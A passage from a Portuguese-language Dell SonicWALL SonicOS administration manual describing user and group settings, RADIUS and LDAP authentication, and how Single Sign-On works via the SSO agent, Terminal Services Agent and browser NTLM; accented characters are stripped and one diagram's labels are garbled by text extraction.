as configuraes dos seguintes itens:
Associao a grupos Os usurios podem pertencer a um ou mais grupos locais. Por
padro, todos os usurios pertencem aos grupos Todos e Usurios confiveis. possvel
remover essas associaes a grupos para um usurio e adicionar associaes a outros
grupos.
Acesso VPN possvel configurar as redes que so acessveis para um cliente VPN
iniciado por este usurio. Ao configurar as configuraes de acesso VPN, possvel
selecionar a partir de uma lista de redes. As redes so designadas por seus nomes de
Grupo ou Objeto de endereo.

Nota A configurao de acesso VPN para os usurios e grupos afeta a capacidade de clientes
remotos de usar marcadores do GVC, NetExtender e SSL VPN Virtual Office para acessar
os recursos da rede. Para permitir que os usurios do GVC, NetExtender ou Virtual Office
acessem um recurso da rede, os objetos ou grupos de endereo da rede devem ser
adicionados lista de permisses na guia Acesso VPN.
Tambm possvel adicionar ou editar grupos locais. As definies configurveis para os

grupos incluem as seguintes:
Configuraes de grupo Para grupos do administrador, possvel configurar o SonicOS
para permitir o login interface de gerenciamento sem ativar a janela de pop-up do status
de login.
Membros do grupo Os grupos tm membros que podem ser usurios locais ou outros
grupos locais.
Acesso VPN O acesso VPN para grupos est configurado da mesma forma como o
acesso VPN para usurios. possvel configurar as redes que so acessveis para um
cliente VPN iniciado por um membro deste grupo. Ao configurar as configuraes de
acesso VPN, possvel selecionar a partir de uma lista de redes. As redes so designadas
por seus nomes de Grupo de endereo ou Objeto de endereo.
Poltica do CFS possvel aplicar uma poltica de filtragem de contedo (CFS) aos
membros do grupo. A configurao da poltica do CFS s estar disponvel se o firewall
estiver atualmente licenciado para o Premium Content Filtering Service.
Usando o RADIUS para a autenticao

O Remote Authentication Dial In User Service (RADIUS) um protocolo utilizado pelos
dispositivos de segurana de rede Dell SonicWALL para autenticar os usurios que tentam
acessar a rede. O servidor RADIUS contm um banco de dados com informaes do usurio

e verifica as credenciais de um usurio com o uso de esquemas de autenticao, como o
Password Authentication Protocol (PAP), Challenge-handshake authentication protocol
(CHAP), Microsoft CHAP (MSCHAP) ou o MSCHAPv2.
Internet

02/
5SER
7ORKSTATION

5SERATTEMPTSTOACCESSTHEWEB
3.7,REQUIRESAUTHENTICATIONOFTHE5SER
REDIRECTSWORKSTATIONTOAUTHENTICATE
5SERAUTHENTICATESWITHCREDENTIALS
3ONIC7!,,REQUESTSINFORMATIONFROM2!$)53
3ERVERABOUT5SER
2!$)533ERVER
2!$)533ERVERRESPONDSWITH5SER'ROUP
-EMBERSHIPINFORMATION
2!$)53'ROUP-EMBERSHIPISCOMPAREDAGAINST
3ONIC7!,,'ROUP-EMBERSHIPFORACCESSINGPRIVILEGES
3.7,AUTHORIZESORDENIESACCESSBASEDON5SERPRIVILEGES
Embora o RADIUS seja muito diferente do LDAP, fornecendo principalmente uma autenticao
segura, ele tambm pode fornecer vrios atributos para cada entrada, incluindo um nmero de
entradas diferentes que podem ser utilizadas para transmitir as associaes a grupos do
usurio. O RADIUS pode armazenar informaes para milhares de usurios e uma boa
opo para fins de autenticao de usurio quando muitos usurios precisam acessar a rede.
Usando a autenticao LDAP/Active Directory/eDirectory

O Lightweight Directory Access Protocol (LDAP) define uma estrutura de servios de diretrio
para armazenar e gerenciar as informaes sobre os elementos de sua rede, como contas do
usurio, grupos do usurio, hosts e servidores. Existem vrios padres diferentes que utilizam
o LDAP para gerenciar contas do usurio, grupos e permisses. Alguns so sistemas
proprietrios, como o Microsoft Active Directory, que pode ser gerenciado com o uso do LDAP.
Alguns so padres abertos SAMBA, que so implementaes dos padres do LDAP. Alguns
so sistemas proprietrios, como o Novell eDirectory, que fornece uma API do LDAP para
gerenciar as informaes de repositrio do usurio.
Alm do RADIUS e do banco de dados local de usurios, o SonicOS suporta o LDAP para a
autenticao do usurio, com suporte para vrios esquemas, incluindo o Microsoft Active
Directory (AD), os servios de diretrio do Novell eDirectory e uma opo totalmente
configurvel definida pelo usurio que permite que ele interaja com qualquer esquema.
O Microsoft Active Directory tambm funciona com o Login nico do Dell SonicWALL e o
Agente SSO do Dell SonicWALL. Para obter mais informaes, consulte Viso geral do Login
nico (SSO) na pgina 957.

Servios de diretrio do LDAP suportados no SonicOS
A fim de ser integrado aos servios de diretrio mais comuns utilizados em redes corporativas,
o SonicOS oferece suporte integrao com os seguintes esquemas do LDAP:
Microsoft Active Directory
RFC2798 InetOrgPerson
RFC2307 Network Information Service
Samba SMB
Novell eDirectory
Esquemas definidos pelo usurio
O SonicOS oferece suporte para servidores de diretrio que executam os seguintes protocolos:
LDAPv2 (RFC3494)
LDAPv3 (RFC2251-2256, RFC3377)
LDAPv3 sobre TLS (RFC2830)
LDAPv3 com STARTTLS (RFC2830)
Recomendaes do LDAP (RFC2251)
Termos do LDAP
Os termos a seguir so teis ao trabalhar com o LDAP e suas variantes:

Esquema O esquema o conjunto de regras ou a estrutura que define os tipos de dados
que podem ser armazenados em um diretrio e como esses dados podem ser
armazenados. Os dados so armazenados na forma de entradas.
Active Directory (AD) O servio de diretrio da Microsoft, muito utilizado com redes com
base no Windows. O Microsoft Active Directory compatvel com o LDAP.
eDirectory O servio de diretrio da Novell, utilizado para redes com base no Novell
NetWare. O Novell eDirectory possui um gateway de LDAP que pode ser utilizado para o
gerenciamento.
Entrada Os dados armazenados no diretrio do LDAP. As entradas so armazenadas em
pares de atributo/valor (ou nome/valor), nos quais os atributos so definidos por classes
de objeto. Um exemplo de entrada seria cn=john, onde cn (nome comum) o atributo
e john o valor.
Classe de objeto As classes de objeto definem os tipos de entradas que um diretrio do
LDAP pode conter. Um exemplo de classe de objeto, conforme utilizada pelo AD, seria
usurio ou grupo.
As Classes do Microsoft Active Directory podem ser visualizadas em
http://msdn.microsoft.com/library/
Objeto Na terminologia do LDAP, as entradas de um diretrio so denominadas objetos.
Para fins da implementao do cliente LDAP do SonicOS, os objetos crticos so objetos
de Usurio e Grupo. As implementaes diferentes do LDAP podem fazer referncia a
essas classes de objeto de diferentes maneiras como, por exemplo, o Active Directory
refere-se ao objeto do usurio como usurio e ao objeto de grupo como grupo,
enquanto o RFC2798 refere-se ao objeto de usurio como inetOrgPerson e ao objeto de
grupo como groupOfNames.
Atributo Um item de dado armazenado em um objeto de um diretrio do LDAP. O objeto
pode ter atributos obrigatrios ou permitidos. Por exemplo, o atributo dc um atributo
obrigatrio do objeto dcObject (componente de domnio).

dn Um nome distinto, que um nome globalmente exclusivo para um usurio ou outro
objeto. Ele composto por um nmero de componentes, geralmente comeando com um
componente de nome comum (cn) e terminando com um domnio especificado como
componentes de dois ou mais domnios (dc). Por exemplo, cn=john, cn=usurios,
dc=domnio, dc=com
cn O atributo nome comum um componente obrigatrio de muitas classes de objeto
por todo o LDAP.
ou O atributo unidade organizacional um componente obrigatrio da maioria das
implementaes do esquema LDAP.
dc O atributo componente de domnio geralmente encontrado na raiz de um nome
distinto e geralmente um atributo obrigatrio.
TLS A Transport Layer Security a verso padronizada do IETF da SSL (Secure Sockets
Layer). O TLS 1.0 o sucessor do SSL 3.0.
Viso geral do Login nico (SSO)

Esta seo fornece uma apresentao do recurso Login nico do SonicOS. Esta seo contm
as seguintes subsees:
Definio de Login nico na pgina 957
Benefcios do SSO do SonicWALL na pgina 958
Plataformas e padres suportados na pgina 959
Como funciona o Login nico? na pgina 960
Como funciona o agente SSO? na pgina 962
Como funciona o Agente de servios de terminal? na pgina 963
Como funciona a Autenticao de NTLM do navegador? na pgina 965
Como funciona a Contabilizao RADIUS para o Login nico? na pgina 966
Definio de Login nico
O Login nico (SSO) um mecanismo de autenticao transparente do usurio que fornece o

acesso privilegiado a vrios recursos da rede com um login de um nico domnio para uma
estao de trabalho ou por meio de um servidor do Windows Terminal Services ou Citrix.
Os dispositivos de segurana de rede Dell SonicWALL oferecem a funcionalidade SSO com o
uso do Agente de Login nico (Agente SSO) e Agente de servios de terminal (TSA) do
SonicWALL para identificar as atividades do usurio. O Agente de Login nico (Agente SSO)
identifica os usurios com base no endereo IP da estao de trabalho. O TSA identifica os
usurios por meio de uma combinao de endereo IP do servidor, nome do usurio e domnio.
O SSO do SonicWALL tambm est disponvel para os usurios do Linux e Mac quando
utilizado com o Samba. Alm disso, a autenticao de NTLM do navegador permite que o SSO
do SonicWALL autentique os usurios que enviam o trfego HTTP, sem a participao do
Agente SSO ou do Samba.
O SSO do SonicWALL est configurado na pgina Usurios > Configuraes da interface de
gerenciamento do SonicOS. O SSO separado das configuraes do Mtodo de
autenticao para login, que podem ser utilizadas ao mesmo tempo para a autenticao de
usurios VPN/L2TP clientes ou administrativos.
Com base em dados do SSO do SonicWALL Agent ou TSA, o firewall consulta o LDAP ou o
banco de dados local para determinar a associao de grupo. As associaes so verificadas
opcionalmente por polticas de firewall para controlar os usurios que tero acesso e podem
ser utilizadas na seleo de polticas de Filtragem de contedo e Controle de aplicativos para

controlar o contedo que lhes permitido acessar. Os nomes de usurio adquiridos por meio
do SSO so relatados nos registros de trfego e eventos dos usurios e no Monitoramento do
AppFlow.
O temporizador de inatividade configurado aplicado com o SSO, mas o limite da sesso no,
embora os usurios que estejam desconectados sejam automtica e imperceptivelmente
conectados novamente ao enviarem mais trfego.
Os usurios conectados a uma estao de trabalho ou a um servidor do Terminal Services/
Citrix diretamente, mas que no estejam conectados ao domnio no sero autenticados, a
menos que enviem o trfego HTTP e que a autenticao NTML do navegador esteja habilitada
(embora, opcionalmente, eles possam ser autenticados para o acesso limitado). Para os
usurios que no esto autenticados pelo SSO do SonicWALL, ser exibida uma tela indicando
que um login manual ao dispositivo necessrio para mais uma etapa da autenticao.
Os usurios que forem identificados, mas que no possuam associaes a grupos obrigatrios
pelas regras de poltica configuradas sero redirecionados para a pgina de Acesso barrado.
Benefcios do SSO do SonicWALL
O SSO do SonicWALL um recurso confivel e que economiza tempo que utiliza um login
nico para oferecer acesso a vrios recursos da rede com base na correspondncia da poltica
e nas associaes a grupos configuradas pelo administrador. O SSO do SonicWALL
transparente para os usurios finais e requer uma configurao mnima do administrador.
Ao determinar automaticamente quando os usurios esto conectados ou desconectados com
base no trfego do endereo IP da estao de trabalho ou, para o Terminal Services ou Citrix,
no trfego de um determinado usurio no endereo IP do servidor, o SSO do SonicWALL
seguro e sem interveno. A autenticao SSO projetada para operar com qualquer agente
externo que possa retornar a identidade de um usurio em uma estao de trabalho ou de um
endereo IP do servidor Terminal Services/Citrix usando um protocolo compatvel com o
SonicWALL Directory Connector.
O SSO do SonicWALL funciona para todos os servios do firewall que utilizem a autenticao
ao nvel do usurio, incluindo o Content Filtering Service (CFS), Regras de acesso do firewall,
herana e associao de grupo e listas de incluso/excluso dos servios de segurana (IPS,
GAV e Anti-Spyware).
Outros benefcios do SSO do SonicWALL incluem:
Facilidade de uso Os usurios s precisam conectar-se uma nica vez para obter acesso
automtico a vrios recursos.
Experincia de usurio aprimorada As credenciais de domnio do Windows podem ser
utilizadas para autenticar um usurio para qualquer tipo de trfego sem precisar efetuar
login no dispositivo com uso de um navegador da web.
Transparncia para os usurios Os usurios no precisam reinserir o nome de usurio e
a senha para a autenticao.
Comunicao segura Criptografia de chave compartilhada para a proteo da
transmisso de dados.
O SSO do SonicWALL Agent pode ser instalado em qualquer servidor do Windows na LAN
e o TSA pode ser instalado em qualquer servidor de terminal.
Vrios Agentes SSO At 8 agentes so suportados para fornecer a capacidade para
instalaes de grande porte
Vrios TSAs Vrios agentes de servios de terminal (um por servidor de terminal) so
suportados. O nmero depende do modelo do dispositivo de segurana de rede Dell
SonicWALL e varia de 8 a 512.
O mecanismo de login funciona com qualquer protocolo, e no somente HTTP.

Autenticao de NTLM do navegador O SSO do SonicWALL pode autenticar os usurios
que enviam o trfego HTTP, sem a participao do Agente SSO.
Suporte para Mac e Linux Com Samba 3.5 e superior, o SSO do SonicWALL suportado
para os usurios do Linux e Mac.
Imposio por zona O SSO do SonicWALL pode ser acionado para o trfego de qualquer
zona, mesmo quando no for automaticamente iniciado pelas regras de acesso do firewall
ou pelas polticas dos servios de segurana, oferecendo a identificao do usurio no
registro em log dos eventos ou no Monitoramento do AppFlow.
Plataformas e padres suportados
O Agente SSO compatvel com todas as verses do SonicOS que oferecem suporte ao SSO
do SonicWALL. Existe suporte para o TSA.
O recurso de SSO oferece suporte a protocolos do LDAP e do banco de dados local. O SSO
do SonicWALL oferece suporte ao SonicWALL Directory Connector. Para que todos os
recursos do SSO do SonicWALL funcionem corretamente, o SonicOS deve ser utilizado com o
Directory Connector 3.1.7 ou superior.
Para usar o SSO do SonicWALL com o Windows Terminal Services ou Citrix, necessrio o
SonicOS 6.0 ou superior, e o SonicWALL TSA deve estar instalado no servidor.
Para usar o SSO do SonicWALL com a autenticao de NTLM do navegador, necessrio o
SonicOS 6.0 ou superior. O agente SSO no necessrio para a autenticao de NTLM do
navegador.
Exceto se usar somente a autenticao de NTLM do navegador, usar o SSO do SonicWALL
requer que o agente SSO esteja instalado em um servidor em seu domnio do Windows que
possa chegar aos clientes e que possa ser acessado a partir do dispositivo, diretamente ou por
meio de um caminho VPN, e/ou requer que o TSA esteja instalado em quaisquer servidores de
terminal no domnio.
Os seguintes requisitos devem ser atendidos para que o agente SSO seja executado:
A porta UDP 2258 (por padro) deve estar aberta; o firewall utiliza a porta UDP 2258 por
padro para se comunicar com o agente SSO da SonicWALL; se uma porta personalizada
for configurada em vez da 2258, esse requisito ser aplicvel porta personalizada
Servidor do Windows, com o service pack mais recente
.NET Framework 2.0
Net API ou WMI
Nota Os PCs com Linux e Mac no oferecem suporte s solicitaes de rede do Windows que
so utilizadas pelo agente SSO e, portanto, requerem o Samba 3.5 ou uma verso mais
recente para funcionar com o SSO do SonicWALL. Sem o Samba, os usurios do Linux e
Mac podem continuar a obter acesso, mas ser necessrio efetuar login para obt-lo. Eles
podem ser redirecionados para o prompt de login se as regras da poltica forem definidas
para exigir a autenticao. Para obter mais informaes, consulte Acomodando usurios do
Mac e Linux na pgina 1060.
Os seguintes requisitos devem ser atendidos para que o TSA seja executado:
A porta UDP 2259 (por padro) deve estar aberta em todos os servidores do terminal nos
quais o TSA esteja instalado; o firewall utiliza a porta UDP 2259 por padro para se
comunicar com o TSA da SonicWALL; se uma porta personalizada for configurada em vez
da porta 2259, esse requisito ser aplicvel porta personalizada
Servidor do Windows, com o service pack mais recente
Windows Terminal Services ou Citrix instalado no(s) sistema(s) do Windows Terminal
Server

Como funciona o Login nico?
O SSO do SonicWALL requer uma configurao mnima do administrador e transparente

para o usurio.
O SSO acionado nas seguintes situaes:
Se as regras de acesso do firewall que requerem a autenticao de usurio sejam
aplicveis ao trfego que no seja proveniente da zona de WAN
Quando nenhum grupo de usurio esteja especificado nas regras de acesso, mas qualquer
das seguintes condies ocorrer, o SSO acionado para todo o trfego na zona (obs.: no
somente para o trfego sujeito a essas condies):
O CFS estiver habilitado na zona e vrias polticas do CFS estejam definidos
O IPS estiver habilitado na zona e se houver polticas do IPS que exijam autenticao
O Anti-Spyware estiver habilitado na zona e se houver polticas do Anti-Spyware que
exijam autenticao
Polticas de Controle de aplicativos que exijam autenticao sejam aplicadas zona
de origem
A imposio por zona do SSO esteja definida para a zona
A tabela de usurio do SSO tambm utilizada para a identificao de usurio e grupo
obrigatria pelos servios de segurana, incluindo a Filtragem de contedo, Preveno contra
invases, Anti-Spyware e Controle de aplicativos.
Autenticao do SSO do SonicWALL usando o Agente SSO
Para os usurios do Windows em estaes de trabalho individuais, o Agente SSO (na estao
de trabalho do SSO) manipula as solicitaes de autenticao do firewall. Existem seis etapas
envolvidas na autenticao do SSO do SonicWALL usando o agente SSO, conforme ilustrado
na figura a seguir.
O processo de autenticao do SSO iniciado quando o trfego do usurio passa por um
firewall. Por exemplo, quando um usurio acessa a Internet. Os pacotes enviados so
temporariamente bloqueados e salvos enquanto o firewall envia uma solicitao de Nome de
usurio e endereo IP da estao de trabalho ao agente de autorizao que executa o Agente
SSO (estao de trabalho do SSO).
O agente de autorizao que executa o Agente SSO fornece ao firewall o nome do usurio
atualmente conectado estao de trabalho. Uma entrada na Tabela de IP do usurio criada
para o usurio conectado, de forma similar ao RADIUS e LDAP.
Autenticao do SSO do SonicWALL usando o Agente de servios de terminal
Para os usurios conectados de um servidor do Terminal Services ou Citrix, o TSA assume o

lugar do agente SSO no processo de autenticao. O processo diferente de vrias maneiras:
O TSA executado no mesmo servidor que o do usurio conectado e inclui o nome do
usurio e o domnio junto com o endereo IP de servidor na notificao inicial ao firewall.
Os usurios so identificados pelo nmero de um usurio, bem como pelo endereo IP
(para os usurios que no utilizam o Terminal Services, como existe somente um usurio
em qualquer endereo IP, no utilizado nenhum nmero de usurio). Um nmero de
usurio diferente de zero exibido na interface de gerenciamento do SonicOS usando o
formato x.x.x.x user n, onde x.x.x.x o endereo IP do servidor e n o nmero do
usurio.
Como o TSA envia uma notificao de encerramento para o SonicOS quando o usurio se
desconectar, no ocorre nenhuma pesquisa.

Depois que um usurio tiver sido identificado, o firewall consulta o LDAP ou um banco de
dados local (com base na configurao do administrador) para localizar as associaes a
grupos do usurio, faz a correspondncia das associaes com a poltica e concede ou
restringe o acesso ao usurio, em conformidade. Aps a concluso bem-sucedida da
sequncia de login, os pacotes salvos so enviados. Se os pacotes forem recebidos do mesmo
endereo de origem antes que a sequncia seja concluda, apenas o pacote mais recente ser
salvo.
Os nomes de usurio so retornados do agente de autorizao que executa o agente SSO no
formato <domnio>/<nome de usurio>. Para os grupos dos usurios configurados localmente,
o nome de usurio pode ser configurado como o nome completo retornado do agente de
autorizao que executa o agente SSO (que configura a correspondncia dos nomes do banco
de dados do usurio local do firewall) ou um nome de usurio simples com o componente de
domnio removido (padro).
Para o protocolo do LDAP, o formato <domnio>/<nome de usurio> convertido em um nome
distinto no LDAP, por meio da criao de uma pesquisa no LDAP para um objeto da classe
domnio com um atributo dc (componente de domnio) que corresponda ao nome de
domnio. Se algum for encontrado, ento seu nome distinto ser utilizado como a subrvore do
diretrio para a pesquisa do objeto do usurio. Por exemplo, se o nome de usurio for
retornado como SV/bob, ento a pesquisa de um objeto com objectClass=domnio e
dc=SV ser realizada. Se ele retornar um objeto com o nome distinto
dc=sv,dc=us,dc=sonicwall,dc=com, ento uma pesquisa na subrvore desse diretrio ser
criada para (no caso do Active Directory) um objeto com objectClass=usurio e
sAMAccountName=bob. Se nenhum objeto de domnio for encontrado, ento a pesquisa pelo
objeto do usurio ser realizada a partir da parte superior da rvore do diretrio.
Depois que um objeto de domnio for encontrado, as informaes so salvas para evitar uma
pesquisa pelo mesmo objeto. Em caso de falha em uma tentativa de localizar um usurio em
um domnio salvo, as informaes do domnio salvas sero excludas e outra pesquisa pelo
objeto de domnio ser realizada.
O logout do usurio manipulado de forma ligeiramente diferente pelo SSO do SonicWALL,
utilizando o Agente SSO em comparao com o SSO com o TSA. O firewall pesquisa o agente
de autorizao que executa o agente SSO a uma taxa configurvel para determinar o momento
em que um usurio foi desconectado. Aps o logout do usurio, o agente de autenticao que
executa o Agente SSO envia uma resposta de Usurio Desconectado ao firewall, confirmando
que o usurio foi desconectado e encerrou a sesso do SSO. Em vez de receber uma pesquisa
pelo firewall, o prprio TSA monitora o servidor do Terminal Services/Citrix para obter os
eventos de logout e notifica o firewall conforme eles ocorrem, encerrando a sesso do SSO.
Para os dois agentes, os temporizadores de inatividade configurveis podem ser definidos, e
para o Agente SSO, a taxa de pesquisa da solicitao do nome de usurio pode ser
configurada (definir um tempo de pesquisa curto para a deteco rpida de logouts ou um
tempo de pesquisa mais longo para uma menor sobrecarga do sistema).
Autenticao do SSO do SonicWALL usando a autenticao de NTLM do navegador
Para os usurios que utilizam os navegadores com base no Mozilla (incluindo o Internet
Explorer, Firefox, Chrome e Safari) o firewall oferece suporte identificao deles por meio da
autenticao de NTLM (Gerenciador de LAN NT). O NTLM faz parte de um conjunto de
autenticaes para navegador conhecido como Segurana integrada do Windows e
suportado por todos os navegadores com base no Mozilla. Ele permite uma solicitao de
autenticao direta a partir do dispositivo para o navegador sem a participao do agente SSO.
O NTLM geralmente utilizado quando um controlador de domnio no est disponvel, nos
casos em que o usurio est autenticando remotamente pela Internet.
A Autenticao de NTLM est atualmente disponvel para HTTP; ela no est disponvel para
uso com o trfego HTTPS.

A autenticao de NTLM para navegador pode ser utilizada antes ou depois que o agente SSO
realizar uma tentativa de adquirir as informaes do usurio. Por exemplo, se o agente SSO
for utilizado primeiro e no for capaz de identificar o usurio, ento se o trfego for HTTP, o
NTLM ser utilizado.
Para usar este mtodo com os clientes do Mac ou Linux, bem como os clientes do Windows,
tambm possvel habilitar o SSO para investigar o cliente em relao ao NetAPI ou WMI,
dependendo de qual estiver configurado para o agente SSO. Isso faz com que o firewall
investigue uma resposta na porta NetAPI/WMI antes de solicitar que o Agente SSO identifique
um usurio. Se nenhuma resposta ocorrer, nesses dispositivos causaro uma falha no SSO
imediatamente. Para um PC com Windows, a investigao geralmente funcionar (a menos
que seja bloqueada por um firewall pessoal) e o Agente SSO ser utilizado. Para um PC com
Linux/Mac (supondo que ele no esteja configurado para executar o servidor Samba), haver
uma falha na investigao, o agente SSO ser ignorado e a autenticao de NTLM ser
utilizada quando o trfego HTTP for enviado.
Como o NTLM no pode identificar o usurio at que ele utilize o HTTP, qualquer trfego
enviado antes disso ser tratado como no identificado. A poltica padro do CFS ser aplicada
e qualquer regra que exigir usurios autenticados no permitir a passagem do trfego.
Se o NTLM estiver configurado para ser utilizado antes do agente SSO, ento se o trfego
HTTP for recebido primeiro, o usurio ser autenticado com o NTLM. Se o trfego fora do
HTTP for recebido primeiro, o agente SSO ser utilizado para a autenticao.
Como funciona o agente SSO?
O Agente SSO pode ser instalado em qualquer estao de trabalho com um domnio do
Windows que possa se comunicar diretamente com clientes e com o firewall, usando o
endereo IP ou um caminho, como VPN. Para obter instrues de instalao para o Agente
SSO, consulte Instalando o Agente SSO do SonicWALL na pgina 1014.
Vrios agentes SSO so suportados para acomodar grandes instalaes com milhares de
usurios. possvel configurar at oito agentes SSO, com cada um deles sendo executado em
um PC dedicado de alto desempenho em sua rede. Observe que um agente SSO em um PC
rpido pode oferecer suporte para at 2500 usurios.
O Agente SSO comunica-se somente com clientes e com o firewall. O Agente SSO utiliza uma
chave compartilhada para a criptografia das mensagens entre o Agente SSO e o firewall.
Nota A chave compartilhada gerada no Agente SSO e a chave digitada no firewall durante a
configurao do SSO dever corresponder exatamente chave gerada pelo Agente SSO.
O firewall consulta o Agente SSO pela porta padro 2258. O agente SSO ento comunica-se
entre o cliente e o firewall para determinar a ID de usurio do cliente. O agente SSO
pesquisado pelo firewall, a uma taxa configurvel pelo administrador, para confirmar de forma
contnua o status de login de um usurio.
Registro em log
O agente SSO envia mensagens de eventos de log para o Registro em log de eventos do
Windows com base nos nveis de registro em log selecionados pelo administrador.
O firewall tambm registra eventos especficos do agente SSO em seu registro em log de
eventos. Segue abaixo uma lista de mensagens de eventos de log especficas para o agente
SSO do firewall:

Login de usurio negado no permitido pela regra da poltica O usurio foi
identificado e no pertence a nenhum grupo de usurio permitido pela poltica, bloqueando
o trfego do usurio.
Login de usurio negado no encontrado localmente O usurio no foi encontrado
localmente e Permitir somente usurios listados localmente selecionado no firewall.
Login de usurio negado tempo limite de agente do agente SSO As tentativas de
entrar em contato com o agente SSO atingiram o tempo limite.
Login de usurio negado erro de configurao do agente SSO O agente SSO no
est corretamente configurado para permitir o acesso para este de usurio.
Login de usurio negado problema de comunicao com o agente SSO H um
problema de comunicao com a estao de trabalho que executa o agente SSO.
Login de usurio negado falha na resoluo de nome do agente do agente SSO
O agente SSO no capaz de descobrir o nome de usurio.
agente SSO retornou nome de usurio muito longo O nome de usurio muito longo.
agente SSO retornou nome de domnio muito longo O nome de domnio muito
longo.
Nota O campo de anotaes das mensagens de log especficas para o agente SSO conter o
texto <domnio/nome de usurio>, autenticao pelo agente SSO.
Como funciona o Agente de servios de terminal?
O TSA pode ser instalado em qualquer mquina com o Windows Server com o Terminal
Services ou Citrix instalado. O servidor deve pertencer a um domnio do Windows que possa
se comunicar diretamente com o firewall, usando o endereo IP ou um caminho, como VPN.
Para obter instrues de instalao para o TSA, consulte Instalando o Agente de Servios de
Terminal do SonicWALL na pgina 1017.
Consulte as sees a seguir para obter informaes sobre o TSA:
Suporte para vrios TSAs na pgina 963
Criptografia de mensagens TSA e uso das IDs de Sesso na pgina 964
Conexes com sub-redes locais na pgina 964
Trfego do usurio fora do domnio do Terminal Server na pgina 964
Trfego de um no usurio do Terminal Server na pgina 964
Suporte para vrios TSAs
Para acomodar grandes instalaes com milhares de usurios, os firewalls so configurveis

para a operao com vrios agentes de servios de terminal (um por servidor de terminal). O
nmero de agentes suportados depende do modelo, conforme mostrado em Tabela 10.
Tabela 10 Suporte para vrios TSAs por modelo
Dispositivo de segurana
de rede Dell SonicWALL Agentes TS suportados
9600 512
9400 512
9200 12
6600 256

Dispositivo de segurana
de rede Dell SonicWALL Agentes TS suportados
5600 128
4600 64
3600 6
Para os dispositivos de segurana de rede Dell SonicWALL da srie 9000, um mximo de 32

endereos IP suportado por servidor de terminal.
Criptografia de mensagens TSA e uso das IDs de Sesso
O TSA utiliza uma chave compartilhada para a criptografia das mensagens entre o TSA e o
firewall quando o nome de usurio e o domnio esto contidos na mensagem. A primeira
notificao de abertura para um usurio sempre criptografada, pois o TSA inclui o nome de
usurio e o domnio.
Nota A chave compartilhada criada no TSA e a chave digitada no firewall durante a

configurao do SSO dever corresponder exatamente chave do TSA.
O TSA inclui uma ID de sesso do usurio em todas as notificaes, em vez de incluir o nome
de usurio e o domnio a cada momento. Isso eficiente, seguro e permite que o TSA
sincronize-se novamente com os usurios do Terminal Services depois que o agente
reiniciado.
Conexes com sub-redes locais
O TSA descobre de forma dinmica a topologia da rede com base nas informaes retornadas
do dispositivo e, depois de descobri-las, ele no enviar as notificaes para o dispositivo para
conexes posteriores do usurio que no passam pelo dispositivo. Como no h nenhum
mecanismo para o TSA esquecer como ele descobriu estes destinos locais, o TSA dever ser
reiniciado se uma sub-rede for movida entre as interfaces do dispositivo.
Trfego do usurio fora do domnio do Terminal Server
O firewall tem a configurao Permitir acesso limitado a usurios fora do domnio para,
opcionalmente, oferecer acesso limitado a usurios fora do domnio (usurios conectados em
sua mquina local e no no domnio), e isso funciona tanto para os usurios de servios do
terminal como para outros usurios do SSO.
Se sua rede incluir computadores com Windows ou dispositivos sem Windows com firewalls
pessoais em execuo, marque a caixa ao lado de Investigar usurio sobre e selecione o
boto de opo para NetAPI ou WMI, dependendo de qual esteja configurado para o Agente
SSO. Isso faz com que o firewall investigue uma resposta na porta NetAPI/WMI antes de
solicitar que o Agente SSO identifique um usurio. Se nenhuma resposta ocorrer, nesses
dispositivos causaro uma falha no SSO imediatamente. Esses dispositivos no respondem
ou podem bloquear as mensagens de rede do Windows utilizadas pelo Agente SSO para
identificar um usurio.
Trfego de um no usurio do Terminal Server
As conexes de um no usurio so abertas a partir das atualizaes do Windows e de

antivrus do Terminal Server. O TSA pode identificar uma conexo de um servio conectado
como sendo uma conexo de um no usurio e indica isso na notificao ao dispositivo.

Para controlar o tratamento dessas conexes de um no usurio, uma caixa de seleo
Permitir trfego de um no usurio do Terminal Server para ignorar a autenticao de
usurio nas regras de acesso est disponvel na configurao do TSA no dispositivo. Ao
serem selecionadas, essas conexes so permitidas. Se esta caixa de seleo no estiver
selecionada, os servios sero tratados como usurios locais e eles podem obter o acesso ao
selecionar a configurao Permitir acesso limitado a usurios fora do domnio e criar
contas de usurio no dispositivo com os nomes de servio correspondentes.
Como funciona a Autenticao de NTLM do navegador?

Autenticao de NTLM dos usurios do domnio na pgina 965
Autenticao de NTLM dos usurios fora do domnio na pgina 965
Credenciais para a autenticao de NTLM no navegador na pgina 965
Autenticao de NTLM dos usurios do domnio
Para os usurios do domnio, a resposta do NTLM autenticada por meio do mecanismo

MSCHAP no RADIUS. O RADIUS deve estar habilitado no dispositivo.
As configuraes a seguir na guia Usurios da configurao do SSO se aplicam ao configurar
a autenticao de NTLM:
Permitir somente usurios listados localmente
Nomes de usurio simples no banco de dados local
Mecanismo para configurar associaes a grupos do usurio (LDAP ou local):
As associaes a grupos do usurio podem ser definidas localmente pela
duplicao de nomes de usurios do LDAP (definidas na configurao do LDAP e
aplicveis quando o mecanismo de associao a grupos do usurio for LDAP)
Taxa de pesquisa
Autenticao de NTLM dos usurios fora do domnio
Com o NTLM, os usurios fora do domnio podem ser usurios que estejam conectados ao seu
PC, e no no domnio, ou podem ser usurios que foram solicitados a inserir um nome de
usurio e uma senha e inseriram algo diferente de suas credenciais de domnio. Nos dois
casos, o NTLM permite distines entre esses usurios do domnio.
Se o nome de usurio corresponder a uma conta local de usurio no firewall, ento a resposta
do NTLM validada localmente em relao senha dessa conta. Se tiver xito, o usurio
registrado e obtm privilgios com base nessa conta. As associaes a grupos do usurio
esto definidas a partir da conta local, e no do LDAP e (j que a senha foi validada
localmente) elas incluem a associao a grupos dos Usurios confiveis.
Se o nome de usurio no corresponder a uma conta local de usurio, o usurio no ser
conectado. A opo Permitir acesso limitado a usurios fora do domnio no se aplica aos
usurios autenticados via NTLM.
Credenciais para a autenticao de NTLM no navegador
Para a autenticao de NTLM, o navegador utiliza as credenciais do domnio (se o usurio

estiver conectado ao domnio), oferecendo assim a funcionalidade total de login nico, ou
solicita ao usurio para inserir um nome e senha para o website que est sendo acessado
(neste caso, o firewall). Diferentes fatores afetam a capacidade do navegador de utilizar as
credenciais do domnio quando o usurio est conectado ao domnio. Esses fatores dependem
do tipo de navegador que est sendo utilizado:

Internet Explorer O Internet Explorer utiliza as credenciais do domnio do usurio e
autentica de forma transparente se o website ao qual ele est se conectando no firewall
est na intranet local, de acordo com a guia Segurana em Opes de Internet. Isto requer
a incluso do firewall na lista de websites na zona de Intranet Local em Opes de Internet.
Isto pode ser feito por meio da poltica de grupo do domnio na Lista de atribuio de
website zona em Configurao do computador, Modelos administrativos, Componentes
